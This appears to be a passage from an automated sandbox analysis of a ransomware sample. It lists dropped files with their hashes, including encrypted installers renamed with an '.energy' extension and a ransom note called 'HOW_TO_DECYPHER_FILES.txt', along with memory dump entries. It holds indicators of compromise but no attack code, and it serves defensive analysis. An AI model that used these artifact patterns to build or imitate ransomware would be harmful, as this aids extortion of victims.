39fd7c53e168cdce6adf78795075ae06cb2b723bb17998481f95e11520937230

SHA512
37290b1c0fdfc6a3cb60a96d0aed946a348507e377c8ce31a3906b5f2b285df1766d2c87f507a19157eebcf9912abcc65389ccd200eee1ed3301f3c22a075001

Download Submit
C:\ProgramData\Package Cache\{79043ED0-7ED1-4227-A5E5-04C5594D21F7}v48.108.8828\dotnet-runtime-6.0.27-win-x64.msi

Filesize
7.1MB

MD5
7bb2d98a3671d99233a2cb002d759988

SHA1
8407749d4f867214fbd453a7f57b4ef209a3be18

SHA256
7eac9f89484a8303a8db686fe1fa3481263afe9e1031cc4f709cda34bc584ffc

SHA512
4d8c17839ea474234d9560b30ad1b4134a1a143ac57b720a12e2fb223113b1fe36a07dd3dce39668d121b50c789fe1b35dc34fd5351e16adf20640ee4aefae41

Download Submit
C:\ProgramData\Package Cache\{BF08E976-B92E-4336-B56F-2171179476C4}v14.30.30704\packages\vcRuntimeAdditional_x86\vc_runtimeAdditional_x86.msi.energy[[email protected]]

Filesize
180KB

MD5
f6e39f8e73034c93ddb841de59155695

SHA1
9e132107bc0d1621f0fd079911e21739797000a7

SHA256
d15f6c01719a75613dc05c04f3f0fe1e90011ba2d6f5c0ee70cb8a3701d01d29

SHA512
80c690c146c352a5c793d67fe3aa3cffc51b40507f8d215e445e457e87d027a04a5290fa3170a36411d8dd9ffc9d81dfe5465401c5bea4ac3e007ebc8a8eda93

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
bd5940f08d0be56e65e5f2aaf47c538e

SHA1
d7e31b87866e5e383ab5499da64aba50f03e8443

SHA256
2d2f364c75bd2897504249f42cdf1d19374f5230aad68fa9154ea3d03e3031a6

SHA512
c34d10c7e07da44a180fae9889b61f08903aa84e8ddfa80c31c272b1ef9d491b8cec6b8a4c836c3cb1583fe8f4955c6a8db872515de3a9e10eae09610c959406

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_q2z1kpll.oof.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.txt

Filesize
828B

MD5
82a88d822f68cc2eaf0f7b3b5cad75bb

SHA1
a437b2177bc7b6d89ce15abf83d37f6e6eacb69a

SHA256
05a16b2800c132d7eded41dfee155adfeb9eedd5d2da3627269ed0ee4ba76885

SHA512
fe83e880459d1a77e1f4487af4940368f1795c0eb14eae6422a580160a741a8ffdd53dcfe6af1e4e235055883cc16eaca52d5752bd9dab367ab39b4ec4a7e9c7

Download Submit
memory/3596-0-0x0000000000FE0000-0x0000000000FFA000-memory.dmp

Filesize
104KB

Download
memory/3596-1-0x00007FF8418E3000-0x00007FF8418E5000-memory.dmp

Filesize
8KB

Download
memory/3596-3-0x00007FF8418E0000-0x00007FF8423A1000-memory.dmp

Filesize
10.8MB

Download
memory/3596-509-0x00007FF8418E0000-0x00007FF8423A1000-memory.dmp

Filesize
10.8MB

Download
memory/4584-29-0x0000022F7E480000-0x0000022F7E4A2000-memory.dmp

Filesize
136KB

Download